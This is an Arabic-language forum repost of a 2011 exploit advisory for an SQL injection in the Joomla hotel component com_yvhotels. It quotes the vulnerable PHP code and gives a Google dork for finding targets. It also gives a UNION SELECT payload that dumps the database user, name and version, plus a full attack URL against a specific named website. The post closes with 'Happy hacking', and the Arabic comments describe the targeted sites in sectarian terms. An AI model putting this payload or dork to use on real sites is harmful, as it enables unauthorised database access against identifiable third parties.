كود:
الثغرة:122:
كود PHP:
# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web
Code:
function show_info( $task ) {
$id = mosGetParam($_REQUEST, 'id');
switch($task) {
case 'desc':
show_hotel_desc( $id );
break;
case 'facils':
show_hotel_facils( $id );
break;
case 'rooms':
show_hotel_rooms( $id );
break;
case 'address':
show_hotel_address( $id );
break;
}
}
function show_hotel_desc( $id ) {
global $database;
$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");
$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];
HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:
exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11
,12,database(),version(),15,16,17,18,19,20,21--
VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,
9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--
Especially for forum.antichat.ru ***1080; rdot.org/forum/
Happy hacking)
z0mbyak.
# 1337day.com [2011-07-18]
هدية رمضان مازال الجديد ؛ كل مواقع الثغرة شيعة بتاريخ 2011-07-28
eyvm v,,,um sQl Joomla com_yvhotels
07-30-2011, 06:26 PM
ثغرة روووعة sQl Joomla com_yvhotels SQL-inj 
العرض العادي
